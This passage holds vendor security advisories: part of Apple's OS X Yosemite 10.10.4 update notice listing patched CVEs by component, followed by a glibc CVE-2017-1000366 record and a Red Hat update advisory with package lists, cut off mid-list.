Seaborn and Thomas Dullien of Google, working\nfrom original research by Yoongu Kim et al (2014)\n\nFontParser\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-3694 : John Villamil (@day6reak), Yahoo Pentest Team\n\nGraphics Driver\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: An out of bounds write issue existed in NVIDIA graphics\ndriver. This issue was addressed through improved bounds checking. \nCVE-ID\nCVE-2015-3712 : Ian Beer of Google Project Zero\n\nIntel Graphics Driver\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple buffer overflow issues exist in the Intel graphics\ndriver, the most serious of which may lead to arbitrary code\nexecution with system privileges\nDescription: Multiple buffer overflow issues existed in the Intel\ngraphics driver. These were addressed through additional bounds\nchecks. \nCVE-ID\nCVE-2015-3695 : Ian Beer of Google Project Zero\nCVE-2015-3696 : Ian Beer of Google Project Zero\nCVE-2015-3697 : Ian Beer of Google Project Zero\nCVE-2015-3698 : Ian Beer of Google Project Zero\nCVE-2015-3699 : Ian Beer of Google Project Zero\nCVE-2015-3700 : Ian Beer of Google Project Zero\nCVE-2015-3701 : Ian Beer of Google Project Zero\nCVE-2015-3702 : KEEN Team\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Multiple vulnerabilities existed in libtiff, the most\nserious of which may lead to arbitrary code execution\nDescription: Multiple vulnerabilities existed in libtiff versions\nprior to 4.0.4. They were addressed by updating libtiff to version\n4.0.4. \nCVE-ID\nCVE-2014-8127\nCVE-2014-8128\nCVE-2014-8129\nCVE-2014-8130\n\nImageIO\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted .tiff file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\n.tiff files. This issue was addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-3703 : Apple\n\nInstall Framework Legacy\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Several issues existed in how Install.framework\u0027s\n\u0027runner\u0027 setuid binary dropped privileges. This was addressed by\nproperly dropping privileges. \nCVE-ID\nCVE-2015-3704 : Ian Beer of Google Project Zero\n\nIOAcceleratorFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple memory corruption issues existed in\nIOAcceleratorFamily. These issues were addressed through improved\nmemory handling. \nCVE-ID\nCVE-2015-3705 : KEEN Team\nCVE-2015-3706 : KEEN Team\n\nIOFireWireFamily\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to execute arbitrary\ncode with system privileges\nDescription: Multiple null pointer dereference issues existed in the\nFireWire driver. These issues were addressed through improved error\nchecking. \nCVE-ID\nCVE-2015-3707 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A memory management issue existed in the handling of\nAPIs related to kernel extensions which could have led to the\ndisclosure of kernel memory layout. This issue was addressed through\nimproved memory management. \nCVE-ID\nCVE-2015-3720 : Stefan Esser\n\nKernel\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: A memory management issue existed in the handling of\nHFS parameters which could have led to the disclosure of kernel\nmemory layout. This issue was addressed through improved memory\nmanagement. \nCVE-ID\nCVE-2015-3721 : Ian Beer of Google Project Zero\n\nkext tools\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to overwrite arbitrary\nfiles\nDescription: kextd followed symbolic links while creating a new\nfile. This issue was addressed through improved handling of symbolic\nlinks. \nCVE-ID\nCVE-2015-3708 : Ian Beer of Google Project Zero\n\nkext tools\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A local user may be able to load unsigned kernel extensions\nDescription: A time-of-check time-of-use (TOCTOU) race condition\ncondition existed while validating the paths of kernel extensions. \nThis issue was addressed through improved checks to validate the path\nof the kernel extensions. \nCVE-ID\nCVE-2015-3709 : Ian Beer of Google Project Zero\n\nMail\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A maliciously crafted email can replace the message content\nwith an arbitrary webpage when the message is viewed\nDescription: An issue existed in the support for HTML email which\nallowed message content to be refreshed with an arbitrary webpage. \nThe issue was addressed through restricted support for HTML content. \nCVE-ID\nCVE-2015-3710 : Aaron Sigel of vtty.com, Jan Soucek\n\nntfs\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to determine kernel\nmemory layout\nDescription: An issue existed in NTFS that could have led to the\ndisclosure of kernel memory content. This issue was addressed through\nimproved memory handling. \nCVE-ID\nCVE-2015-3711 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nntp\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: An attacker in a privileged position may be able to perform\na denial of service attack against two ntp clients\nDescription: Multiple issues existed in the authentication of ntp\npackets being received by configured end-points. These issues were\naddressed through improved connection state management. \nCVE-ID\nCVE-2015-1798\nCVE-2015-1799\n\nOpenSSL\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Multiple issues exist in OpenSSL, including one that may\nallow an attacker to intercept connections to a server that supports\nexport-grade ciphers\nDescription: Multiple issues existed in OpenSSL 0.9.8zd which were\naddressed by updating OpenSSL to version 0.9.8zf. \nCVE-ID\nCVE-2015-0209\nCVE-2015-0286\nCVE-2015-0287\nCVE-2015-0288\nCVE-2015-0289\nCVE-2015-0293\n\nQuickTime\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted movie file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: Multiple memory corruption issues existed in QuickTime. \nThese issues were addressed through improved memory handling. \nCVE-ID\nCVE-2015-3661 : G. Geshev working with HP\u0027s Zero Day Initiative\nCVE-2015-3662 : kdot working with HP\u0027s Zero Day Initiative\nCVE-2015-3663 : kdot working with HP\u0027s Zero Day Initiative\nCVE-2015-3666 : Steven Seeley of Source Incite working with HP\u0027s Zero\nDay Initiative\nCVE-2015-3667 : Ryan Pentney, Richard Johnson of Cisco Talos and Kai\nLu of Fortinet\u0027s FortiGuard Labs, Ryan Pentney, and Richard Johnson\nof Cisco Talos and Kai Lu of Fortinet\u0027s FortiGuard Labs\nCVE-2015-3668 : Kai Lu of Fortinet\u0027s FortiGuard Labs\nCVE-2015-3713 : Apple\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may cause an unexpected application\ntermination or arbitrary code execution\nDescription: An integer overflow existed in the Security framework\ncode for parsing S/MIME e-mail and some other signed or encrypted\nobjects. This issue was addressed through improved validity checking. \nCVE-ID\nCVE-2013-1741\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Tampered applications may not be prevented from launching\nDescription: Apps using custom resource rules may have been\nsusceptible to tampering that would not have invalidated the\nsignature. This issue was addressed with improved resource\nvalidation. \nCVE-ID\nCVE-2015-3714 : Joshua Pitts of Leviathan Security Group\n\nSecurity\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: A malicious application may be able to bypass code signing\nchecks\nDescription: An issue existed where code signing did not verify\nlibraries loaded outside the application bundle. This issue was\naddressed with improved bundle verification. \nCVE-ID\nCVE-2015-3715 : Patrick Wardle of Synack\n\nSpotlight\nAvailable for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5,\nOS X Yosemite v10.10 to v10.10.3\nImpact: Searching for a malicious file with Spotlight may lead to\ncommand injection\nDescription: A command injection vulnerability existed in the\nhandling of filenames of photos added to the local photo library. \nThis issue was addressed through improved input validation. \nCVE-ID\nCVE-2015-3716 : Apple\n\nSQLite\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A remote attacker may cause an unexpected application\ntermination or arbitrary code execution\nDescription: Multiple buffer overflows existed in SQLite\u0027s printf\nimplementation. These issues were addressed through improved bounds\nchecking. \nCVE-ID\nCVE-2015-3717 : Peter Rutenbar working with HP\u0027s Zero Day Initiative\n\nSystem Stats\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: A malicious app may be able to compromise systemstatsd\nDescription: A type confusion issue existed in systemstatsd\u0027s\nhandling of interprocess communication. By sending a maliciously\nformatted message to systemstatsd, it may have been possible to\nexecute arbitrary code as the systemstatsd process. The issue was\naddressed through additional type checking. \nCVE-ID\nCVE-2015-3718 : Roberto Paleari and Aristide Fattori of Emaze\nNetworks\n\nTrueTypeScaler\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Processing a maliciously crafted font file may lead to an\nunexpected application termination or arbitrary code execution\nDescription: A memory corruption issue existed in the processing of\nfont files. This issue was addressed through improved input\nvalidation. \nCVE-ID\nCVE-2015-3719 : John Villamil (@day6reak), Yahoo Pentest Team\n\nzip\nAvailable for: OS X Yosemite v10.10 to v10.10.3\nImpact: Extracting a maliciously crafted zip file using the unzip\ntool may lead to an unexpected application termination or arbitrary\ncode execution\nDescription: Multiple memory corruption issues existed in the\nhandling of zip files. These issues were addressed through improved\nmemory handling. \nCVE-ID\n\nCVE-2014-8139\nCVE-2014-8140\nCVE-2014-8141\n\n\nOS X Yosemite 10.10.4 includes the security content of Safari 8.0.7. \nhttps://support.apple.com/en-us/HT204950\n\nOS X Yosemite 10.10.4 and Security Update 2015-005 may be obtained\nfrom the Mac App Store or Apple\u0027s Software Downloads web site:\nhttp://www.apple.com/support/downloads/\n\nInformation will also be posted to the Apple Security Updates\nweb site: http://support.apple.com/kb/HT1222\n\nThis message is signed with Apple\u0027s Product Security PGP key,\nand details are available at:\nhttps://www.apple.com/support/security/pgp/\n\n\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG/MacGPG2 v2\nComment: GPGTools - http://gpgtools.org\n\niQIcBAEBCAAGBQJVksFmAAoJEBcWfLTuOo7tV1AQAIYpkOMpHp181b+70sgyZ/Ue\nmFM527FFGDfLLuIW6LTcBsEFe9cfZxumB8eOFPirTNRK7krsVMo1W+faHXyWOnx7\nkbWylHdhaoxnX+A6Gj0vP71V6TNNsTi9+2dmdmHUnwxZ7Ws5QCNKebumUG3MMXXo\nEKxE5SNSNKyMSSYmliS26cdl8fWrmg9qTxiZQnxjOCrg/CNAolgVIRRfdMUL7i4w\naGAyrlJXOxFOuNkqdHX2luccuHFV7aW/dIXQ4MyjiRNl/bWrBQmQlneLLpPdFZlH\ncMfGa2/baaNaCbU/GqhNKbO4fKYVaqQWzfUrtqX0+bRv2wmOq33ARy9KE23bYTvL\nU4E9x9z87LsLXGAdjUi6MDe5g87DcmwIEigfF6/EHbDYa/2VvSdIa74XRv/JCN1+\naftHLotin76h4qV/dCAPf5J/Fr/1KFCM0IphhG7p+7fVTfyy7YDXNBiKCEZzLf8U\nTUWLUCgQhobtakqwzQJ5qyF8u63xzVXj8oeTOw6iiY/BLlj9def5LMm/z6ZKGTyC\n3c4+Sy5XvBHZoeiwdcndTVpnFbmmjZRdeqtdW/zX5mHnxXPa3lZiGoBDhHQgIg6J\n1tTVtnO1JSLXVYDR6Evx1EH10Vgkt2wAGTLjljSLwtckoEqc78qMAT1G5U4nFffI\n+gGm5FbAxjxElgA/gbaq\n=KLda\n-----END PGP SIGNATURE-----\n",
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VAR-201706-0334
Vulnerability from variot - Updated: 2026-04-10 22:46glibc contains a vulnerability that allows specially crafted LD_LIBRARY_PATH values to manipulate the heap/stack, causing them to alias, potentially resulting in arbitrary code execution. Please note that additional hardening changes have been made to glibc to prevent manipulation of stack and heap memory but these issues are not directly exploitable, as such they have not been given a CVE. This affects glibc 2.25 and earlier. glibc Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. GNU glibc is prone to local memory-corruption vulnerability. An attacker could exploit this issue to execute arbitrary code in the context of the application. GNU glibc 2.25 and prior versions are vulnerable. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1
===================================================================== Red Hat Security Advisory
Synopsis: Important: glibc security update Advisory ID: RHSA-2017:1479-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2017:1479 Issue date: 2017-06-19 CVE Names: CVE-2017-1000366 =====================================================================
- Summary:
An update for glibc is now available for Red Hat Enterprise Linux 5 Extended Lifecycle Support, Red Hat Enterprise Linux 5.9 Long Life, Red Hat Enterprise Linux 6.2 Advanced Update Support, Red Hat Enterprise Linux 6.4 Advanced Update Support, Red Hat Enterprise Linux 6.5 Advanced Update Support, Red Hat Enterprise Linux 6.5 Telco Extended Update Support, Red Hat Enterprise Linux 6.6 Advanced Update Support, Red Hat Enterprise Linux 6.6 Telco Extended Update Support, Red Hat Enterprise Linux 6.7 Extended Update Support, and Red Hat Enterprise Linux 7.2 Extended Update Support.
Red Hat Product Security has rated this update as having a security impact of Important. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat Enterprise Linux ComputeNode EUS (v. 7.2) - x86_64 Red Hat Enterprise Linux ComputeNode Optional EUS (v. 7.2) - x86_64 Red Hat Enterprise Linux HPC Node EUS (v. 6.7) - x86_64 Red Hat Enterprise Linux HPC Node Optional EUS (v. 6.7) - x86_64 Red Hat Enterprise Linux Long Life (v. 5.9 server) - i386, ia64, x86_64 Red Hat Enterprise Linux Server (v. 5 ELS) - i386, s390x, x86_64 Red Hat Enterprise Linux Server AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.4) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server AUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server EUS (v. 6.7) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server EUS (v. 7.2) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.2) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.4) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server Optional AUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 6.7) - i386, ppc64, s390x, x86_64 Red Hat Enterprise Linux Server Optional EUS (v. 7.2) - ppc64, ppc64le, s390x, x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server Optional TUS (v. 6.6) - x86_64 Red Hat Enterprise Linux Server TUS (v. 6.5) - x86_64 Red Hat Enterprise Linux Server TUS (v. 6.6) - x86_64
- Description:
The glibc packages provide the standard C libraries (libc), POSIX thread libraries (libpthread), standard math libraries (libm), and the name service cache daemon (nscd) used by multiple programs on the system. Without these libraries, the Linux system cannot function correctly. This is glibc-side mitigation which blocks processing of LD_LIBRARY_PATH for programs running in secure-execution mode and reduces the number of allocations performed by the processing of LD_AUDIT, LD_PRELOAD, and LD_HWCAP_MASK, making successful exploitation of this issue more difficult. (CVE-2017-1000366)
Red Hat would like to thank Qualys Research Labs for reporting this issue.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
For the update to take effect, all services linked to the glibc library must be restarted, or the system rebooted.
- Bugs fixed (https://bugzilla.redhat.com/):
1452543 - CVE-2017-1000366 glibc: heap/stack gap jumping via unbounded stack allocations
- Package List:
Red Hat Enterprise Linux Long Life (v. 5.9 server):
Source: glibc-2.5-107.el5_9.9.src.rpm
i386: glibc-2.5-107.el5_9.9.i386.rpm glibc-2.5-107.el5_9.9.i686.rpm glibc-common-2.5-107.el5_9.9.i386.rpm glibc-debuginfo-2.5-107.el5_9.9.i386.rpm glibc-debuginfo-2.5-107.el5_9.9.i686.rpm glibc-debuginfo-common-2.5-107.el5_9.9.i386.rpm glibc-devel-2.5-107.el5_9.9.i386.rpm glibc-headers-2.5-107.el5_9.9.i386.rpm glibc-utils-2.5-107.el5_9.9.i386.rpm nscd-2.5-107.el5_9.9.i386.rpm
ia64: glibc-2.5-107.el5_9.9.i686.rpm glibc-2.5-107.el5_9.9.ia64.rpm glibc-common-2.5-107.el5_9.9.ia64.rpm glibc-debuginfo-2.5-107.el5_9.9.i686.rpm glibc-debuginfo-2.5-107.el5_9.9.ia64.rpm glibc-debuginfo-common-2.5-107.el5_9.9.i386.rpm glibc-devel-2.5-107.el5_9.9.ia64.rpm glibc-headers-2.5-107.el5_9.9.ia64.rpm glibc-utils-2.5-107.el5_9.9.ia64.rpm nscd-2.5-107.el5_9.9.ia64.rpm
x86_64: glibc-2.5-107.el5_9.9.i686.rpm glibc-2.5-107.el5_9.9.x86_64.rpm glibc-common-2.5-107.el5_9.9.x86_64.rpm glibc-debuginfo-2.5-107.el5_9.9.i386.rpm glibc-debuginfo-2.5-107.el5_9.9.i686.rpm glibc-debuginfo-2.5-107.el5_9.9.x86_64.rpm glibc-debuginfo-common-2.5-107.el5_9.9.i386.rpm glibc-devel-2.5-107.el5_9.9.i386.rpm glibc-devel-2.5-107.el5_9.9.x86_64.rpm glibc-headers-2.5-107.el5_9.9.x86_64.rpm glibc-utils-2.5-107.el5_9.9.x86_64.rpm nscd-2.5-107.el5_9.9.x86_64.rpm
Red Hat Enterprise Linux Server (v. 5 ELS):
Source: glibc-2.5-123.el5_11.4.src.rpm
i386: glibc-2.5-123.el5_11.4.i386.rpm glibc-2.5-123.el5_11.4.i686.rpm glibc-common-2.5-123.el5_11.4.i386.rpm glibc-debuginfo-2.5-123.el5_11.4.i386.rpm glibc-debuginfo-2.5-123.el5_11.4.i686.rpm glibc-debuginfo-common-2.5-123.el5_11.4.i386.rpm glibc-devel-2.5-123.el5_11.4.i386.rpm glibc-headers-2.5-123.el5_11.4.i386.rpm glibc-utils-2.5-123.el5_11.4.i386.rpm nscd-2.5-123.el5_11.4.i386.rpm
s390x: glibc-2.5-123.el5_11.4.s390.rpm glibc-2.5-123.el5_11.4.s390x.rpm glibc-common-2.5-123.el5_11.4.s390x.rpm glibc-debuginfo-2.5-123.el5_11.4.s390.rpm glibc-debuginfo-2.5-123.el5_11.4.s390x.rpm glibc-devel-2.5-123.el5_11.4.s390.rpm glibc-devel-2.5-123.el5_11.4.s390x.rpm glibc-headers-2.5-123.el5_11.4.s390x.rpm glibc-utils-2.5-123.el5_11.4.s390x.rpm nscd-2.5-123.el5_11.4.s390x.rpm
x86_64: glibc-2.5-123.el5_11.4.i686.rpm glibc-2.5-123.el5_11.4.x86_64.rpm glibc-common-2.5-123.el5_11.4.x86_64.rpm glibc-debuginfo-2.5-123.el5_11.4.i386.rpm glibc-debuginfo-2.5-123.el5_11.4.i686.rpm glibc-debuginfo-2.5-123.el5_11.4.x86_64.rpm glibc-debuginfo-common-2.5-123.el5_11.4.i386.rpm glibc-devel-2.5-123.el5_11.4.i386.rpm glibc-devel-2.5-123.el5_11.4.x86_64.rpm glibc-headers-2.5-123.el5_11.4.x86_64.rpm glibc-utils-2.5-123.el5_11.4.x86_64.rpm nscd-2.5-123.el5_11.4.x86_64.rpm
Red Hat Enterprise Linux HPC Node EUS (v. 6.7):
Source: glibc-2.12-1.166.el6_7.8.src.rpm
x86_64: glibc-2.12-1.166.el6_7.8.i686.rpm glibc-2.12-1.166.el6_7.8.x86_64.rpm glibc-common-2.12-1.166.el6_7.8.x86_64.rpm glibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-2.12-1.166.el6_7.8.x86_64.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.x86_64.rpm glibc-devel-2.12-1.166.el6_7.8.i686.rpm glibc-devel-2.12-1.166.el6_7.8.x86_64.rpm glibc-headers-2.12-1.166.el6_7.8.x86_64.rpm glibc-utils-2.12-1.166.el6_7.8.x86_64.rpm nscd-2.12-1.166.el6_7.8.x86_64.rpm
Red Hat Enterprise Linux HPC Node Optional EUS (v. 6.7):
x86_64: glibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-2.12-1.166.el6_7.8.x86_64.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.x86_64.rpm glibc-static-2.12-1.166.el6_7.8.i686.rpm glibc-static-2.12-1.166.el6_7.8.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.2):
Source: glibc-2.12-1.47.el6_2.18.src.rpm
x86_64: glibc-2.12-1.47.el6_2.18.i686.rpm glibc-2.12-1.47.el6_2.18.x86_64.rpm glibc-common-2.12-1.47.el6_2.18.x86_64.rpm glibc-debuginfo-2.12-1.47.el6_2.18.i686.rpm glibc-debuginfo-2.12-1.47.el6_2.18.x86_64.rpm glibc-debuginfo-common-2.12-1.47.el6_2.18.i686.rpm glibc-debuginfo-common-2.12-1.47.el6_2.18.x86_64.rpm glibc-devel-2.12-1.47.el6_2.18.i686.rpm glibc-devel-2.12-1.47.el6_2.18.x86_64.rpm glibc-headers-2.12-1.47.el6_2.18.x86_64.rpm glibc-utils-2.12-1.47.el6_2.18.x86_64.rpm nscd-2.12-1.47.el6_2.18.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.4):
Source: glibc-2.12-1.107.el6_4.10.src.rpm
x86_64: glibc-2.12-1.107.el6_4.10.i686.rpm glibc-2.12-1.107.el6_4.10.x86_64.rpm glibc-common-2.12-1.107.el6_4.10.x86_64.rpm glibc-debuginfo-2.12-1.107.el6_4.10.i686.rpm glibc-debuginfo-2.12-1.107.el6_4.10.x86_64.rpm glibc-debuginfo-common-2.12-1.107.el6_4.10.i686.rpm glibc-debuginfo-common-2.12-1.107.el6_4.10.x86_64.rpm glibc-devel-2.12-1.107.el6_4.10.i686.rpm glibc-devel-2.12-1.107.el6_4.10.x86_64.rpm glibc-headers-2.12-1.107.el6_4.10.x86_64.rpm glibc-utils-2.12-1.107.el6_4.10.x86_64.rpm nscd-2.12-1.107.el6_4.10.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.5):
Source: glibc-2.12-1.132.el6_5.9.src.rpm
x86_64: glibc-2.12-1.132.el6_5.9.i686.rpm glibc-2.12-1.132.el6_5.9.x86_64.rpm glibc-common-2.12-1.132.el6_5.9.x86_64.rpm glibc-debuginfo-2.12-1.132.el6_5.9.i686.rpm glibc-debuginfo-2.12-1.132.el6_5.9.x86_64.rpm glibc-debuginfo-common-2.12-1.132.el6_5.9.i686.rpm glibc-debuginfo-common-2.12-1.132.el6_5.9.x86_64.rpm glibc-devel-2.12-1.132.el6_5.9.i686.rpm glibc-devel-2.12-1.132.el6_5.9.x86_64.rpm glibc-headers-2.12-1.132.el6_5.9.x86_64.rpm glibc-utils-2.12-1.132.el6_5.9.x86_64.rpm nscd-2.12-1.132.el6_5.9.x86_64.rpm
Red Hat Enterprise Linux Server TUS (v. 6.5):
Source: glibc-2.12-1.132.el6_5.9.src.rpm
x86_64: glibc-2.12-1.132.el6_5.9.i686.rpm glibc-2.12-1.132.el6_5.9.x86_64.rpm glibc-common-2.12-1.132.el6_5.9.x86_64.rpm glibc-debuginfo-2.12-1.132.el6_5.9.i686.rpm glibc-debuginfo-2.12-1.132.el6_5.9.x86_64.rpm glibc-debuginfo-common-2.12-1.132.el6_5.9.i686.rpm glibc-debuginfo-common-2.12-1.132.el6_5.9.x86_64.rpm glibc-devel-2.12-1.132.el6_5.9.i686.rpm glibc-devel-2.12-1.132.el6_5.9.x86_64.rpm glibc-headers-2.12-1.132.el6_5.9.x86_64.rpm glibc-utils-2.12-1.132.el6_5.9.x86_64.rpm nscd-2.12-1.132.el6_5.9.x86_64.rpm
Red Hat Enterprise Linux Server AUS (v. 6.6):
Source: glibc-2.12-1.149.el6_6.12.src.rpm
x86_64: glibc-2.12-1.149.el6_6.12.i686.rpm glibc-2.12-1.149.el6_6.12.x86_64.rpm glibc-common-2.12-1.149.el6_6.12.x86_64.rpm glibc-debuginfo-2.12-1.149.el6_6.12.i686.rpm glibc-debuginfo-2.12-1.149.el6_6.12.x86_64.rpm glibc-debuginfo-common-2.12-1.149.el6_6.12.i686.rpm glibc-debuginfo-common-2.12-1.149.el6_6.12.x86_64.rpm glibc-devel-2.12-1.149.el6_6.12.i686.rpm glibc-devel-2.12-1.149.el6_6.12.x86_64.rpm glibc-headers-2.12-1.149.el6_6.12.x86_64.rpm glibc-utils-2.12-1.149.el6_6.12.x86_64.rpm nscd-2.12-1.149.el6_6.12.x86_64.rpm
Red Hat Enterprise Linux Server TUS (v. 6.6):
Source: glibc-2.12-1.149.el6_6.12.src.rpm
x86_64: glibc-2.12-1.149.el6_6.12.i686.rpm glibc-2.12-1.149.el6_6.12.x86_64.rpm glibc-common-2.12-1.149.el6_6.12.x86_64.rpm glibc-debuginfo-2.12-1.149.el6_6.12.i686.rpm glibc-debuginfo-2.12-1.149.el6_6.12.x86_64.rpm glibc-debuginfo-common-2.12-1.149.el6_6.12.i686.rpm glibc-debuginfo-common-2.12-1.149.el6_6.12.x86_64.rpm glibc-devel-2.12-1.149.el6_6.12.i686.rpm glibc-devel-2.12-1.149.el6_6.12.x86_64.rpm glibc-headers-2.12-1.149.el6_6.12.x86_64.rpm glibc-utils-2.12-1.149.el6_6.12.x86_64.rpm nscd-2.12-1.149.el6_6.12.x86_64.rpm
Red Hat Enterprise Linux Server EUS (v. 6.7):
Source: glibc-2.12-1.166.el6_7.8.src.rpm
i386: glibc-2.12-1.166.el6_7.8.i686.rpm glibc-common-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm glibc-devel-2.12-1.166.el6_7.8.i686.rpm glibc-headers-2.12-1.166.el6_7.8.i686.rpm glibc-utils-2.12-1.166.el6_7.8.i686.rpm nscd-2.12-1.166.el6_7.8.i686.rpm
ppc64: glibc-2.12-1.166.el6_7.8.ppc.rpm glibc-2.12-1.166.el6_7.8.ppc64.rpm glibc-common-2.12-1.166.el6_7.8.ppc64.rpm glibc-debuginfo-2.12-1.166.el6_7.8.ppc.rpm glibc-debuginfo-2.12-1.166.el6_7.8.ppc64.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.ppc.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.ppc64.rpm glibc-devel-2.12-1.166.el6_7.8.ppc.rpm glibc-devel-2.12-1.166.el6_7.8.ppc64.rpm glibc-headers-2.12-1.166.el6_7.8.ppc64.rpm glibc-utils-2.12-1.166.el6_7.8.ppc64.rpm nscd-2.12-1.166.el6_7.8.ppc64.rpm
s390x: glibc-2.12-1.166.el6_7.8.s390.rpm glibc-2.12-1.166.el6_7.8.s390x.rpm glibc-common-2.12-1.166.el6_7.8.s390x.rpm glibc-debuginfo-2.12-1.166.el6_7.8.s390.rpm glibc-debuginfo-2.12-1.166.el6_7.8.s390x.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.s390.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.s390x.rpm glibc-devel-2.12-1.166.el6_7.8.s390.rpm glibc-devel-2.12-1.166.el6_7.8.s390x.rpm glibc-headers-2.12-1.166.el6_7.8.s390x.rpm glibc-utils-2.12-1.166.el6_7.8.s390x.rpm nscd-2.12-1.166.el6_7.8.s390x.rpm
x86_64: glibc-2.12-1.166.el6_7.8.i686.rpm glibc-2.12-1.166.el6_7.8.x86_64.rpm glibc-common-2.12-1.166.el6_7.8.x86_64.rpm glibc-debuginfo-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-2.12-1.166.el6_7.8.x86_64.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.i686.rpm glibc-debuginfo-common-2.12-1.166.el6_7.8.x86_64.rpm glibc-devel-2.12-1.166.el6_7.8.i686.rpm glibc-devel-2.12-1.166.el6_7.8.x86_64.rpm glibc-headers-2.12-1.166.el6_7.8.x86_64.rpm glibc-utils-2.12-1.166.el6_7.8.x86_64.rpm nscd-2.12-1.166.el6_7.8.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.2):
Source: glibc-2.12-1.47.el6_2.18.src.rpm
x86_64: glibc-debuginfo-2.12-1.47.el6_2.18.i686.rpm glibc-debuginfo-2.12-1.47.el6_2.18.x86_64.rpm glibc-debuginfo-common-2.12-1.47.el6_2.18.i686.rpm glibc-debuginfo-common-2.12-1.47.el6_2.18.x86_64.rpm glibc-static-2.12-1.47.el6_2.18.i686.rpm glibc-static-2.12-1.47.el6_2.18.x86_64.rpm
Red Hat Enterprise Linux Server Optional AUS (v. 6.4):
Source: glibc-2.12-1.107.el6_4.10.src.rpm
